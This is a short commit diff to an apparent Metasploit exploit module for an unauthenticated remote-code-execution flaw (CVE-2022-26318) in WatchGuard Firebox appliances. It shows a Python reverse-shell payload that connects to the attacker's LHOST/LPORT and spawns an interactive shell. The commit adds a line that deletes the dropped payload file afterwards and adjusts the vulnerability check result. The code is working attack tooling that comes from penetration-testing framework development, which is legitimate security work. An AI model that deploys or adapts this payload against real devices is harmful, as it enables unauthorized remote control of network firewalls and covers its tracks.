update addressing jheysel-r7 comments

h00die-gr3y · h00die-gr3y · commit 6e6f1beb9297 · 2024-03-28T08:43:08.000Z
diff --git a/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb b/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
@@ -121,19 +121,13 @@ def create_bof_payload
     payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode
     payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode
     payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode
+    payload << "import os; os.remove(\"#{@py_fname}\");".encode
     return Zlib.gzip(payload)
   end
 
-  def on_new_session(session)
-    # cleanup python payload script in /tmp
-    session.run_command('import os')
-    session.run_command("os.remove(\"#{@py_fname}\")")
-    super
-  end
-
   def check
     print_status("Checking if #{peer} can be exploited.")
-    return CheckCode::Appears if check_watchguard_firebox?
+    return CheckCode::Detected if check_watchguard_firebox?
 
     CheckCode::Safe
   end
